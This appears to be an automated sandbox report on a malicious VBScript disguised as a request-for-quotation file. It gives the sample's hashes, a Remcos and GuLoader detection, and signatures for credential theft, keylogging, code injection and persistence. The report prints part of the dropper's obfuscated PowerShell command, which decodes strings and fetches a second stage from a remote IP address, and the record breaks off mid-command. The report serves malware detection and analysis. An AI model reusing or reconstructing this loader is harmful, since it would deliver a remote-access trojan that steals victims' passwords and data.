Edit tour
Windows
Analysis Report
RFQ.NO. S70-23Q-1474-CS-P.vbs
Overview
General Information
| Sample name: | RFQ.NO. S70-23Q-1474-CS-P.vbs |
| Analysis ID: | 1428130 |
| MD5: | e93e1296b7e4688e847b299faed3bef2 |
| SHA1: | b3a6d46e8b062e47efd38e88d85d10125cff102d |
| SHA256: | 78a74e42bcf0d0df7cb482f178307235d60fbf59754456c2f742c4510dc83697 |
| Tags: | RFQvbs |
| Infos: |   |
 | |
Detection
Remcos, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6172 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\RFQ.N O. S70-23Q -1474-CS-P .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 5768 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Typhoids 213 = 1;$A trible='Su bstrin';$A trible+='g ';Function Noncolloi d($Offtype ){$Focalis ation=$Off type.Lengt h-$Typhoid s213;For($ Halmknippe rne183=6; $Halmknipp erne183 -l t $Focalis ation; $Ha lmknippern e183+=(7)) {$Eksisten sberettige lsers+=$Of ftype.$Atr ible.Invok e($Halmkni pperne183, $Typhoids 213);}$Eks istensbere ttigelsers ;}function Skruegang en($Epilep tikere){. ($Slag fjedres) ( $Epileptik ere);}$Tot alsanering ens=Noncol loid 'Oeno phMUnesseo Ma,lesz Fa stli C,amo lRelatil P ud.na F.lm k/Hem el5 Bakk..Ensi gn0Hepato Lr.rk(feas inWUddrivi HalvpunLaa nendBltedy oPopulaw p ectrsfly,a s St alvNI ndladTDiap ha Kampv1S ygele0Duv, ty.Smaate0 T rgiv; Fi nge So,ene WPokerfiLu dd rn elvo v6Unwins4P roduk;Gast ro arylaxD .pped6Bl k er4T veaa; nonval pr inrBovensv En ag:Ce. ser1 Bldg. 2Coelio1 S terr.Sella a0Foreto)S vange Logi kpGSub,tie NyhedscOv, ryekMiljst oPan li/Ho rome2D.cty l0Wordst1S kibsb0 Vaj en0Cascab1 Chubb0 la nds1 edest Tsil.F.ig sstiDatabe r Portee T je efBlend aoBabs nx raspe/Subp et1 ,alst2 Ytterp1Ter r.s.Append 0Datalo '; $Fewterer= Noncolloid 'OutpouUS am ens Fin ebeValgkar ndring-Mus eo,At.trad gEndagse D riftnconve ytH skwo ' ;$Onomatol ogical=Non colloid ' Dor khRefo rgtDepictt Grnsevp Sk att:La,ish /Signal/Eg ebr.8Flann e7Re.sbg.G arden1fluo ar2I.sera1 Ov rta.fol ioa1forret 0Vejrud5 g alip.Jocke y1Alpeho8O verme4Tilf rs/Kil,brF VandreoFus iondKlinke g Gulvmn , caphgLipol yeBlkketrM illiboPoly a,vstiknae EristirLan dingModbyd aBlokf nSu bu bgForva lsEncykl.C ecostpDent alrBaconim Brordt ';$ Raastoffor brugets=No ncolloid ' Tyrann>Ery thr ';$Sla gfjedres=N oncolloid 'Philosi G latieVejby xPorch '; $Chlor = N oncolloid ' Rei.seOv nopocKlass ihPretaroF ael,e Pont if%Boltela Lich.ipVal derpL.paro dchordaast udeotChefk aaStdfan% Reage\Kom unU Bedfon K,rnipCat .clr.tvrke eIllapsd T elluiTelep hc,ecramtM aalesa.kol dnbMehtarl BoheaeBye no,nMalaja e Sj.eds F .rbisSermo n.kat lyN roteae,etr ibgCocard Senso.& Ab ais&Centra TaktikePh ot ccskogg ehBibelloP hrase Tart uf$pensio ';Skruegan gen (Nonco lloid 'Skr ive$Verden gVomitolLo ninoNonap .bPhraseaF remtilTirr iv:NashveS utoyecHur ricoSta me uHove arSt eno,eMiser esKaritasG odk n=Unbu rl(Skamskc til,ifmRoy en dNicoti trat/Cap ablc Splej Timber$Tr ojkaCKarbu rh San,rlT reatmo Art igrKaol,n) Hjkant '); Skruegange n (Noncoll oid 'Or,cu l$TekstsgI ntolelIret t.o Proscb urisda No nsyl Tyksa :Saf.naTFi tc eoOvera fpcorrivs MyelolV nf rb=Thespi$ BispegOPlo .tenTvehun o.fordem , aareaUdvan dt upersoD ik malZucc heoDrejefg ParaffiKol lidc Afv.s aBarytolRe klip.Ma la ssOmkrsepA fslutlUdlu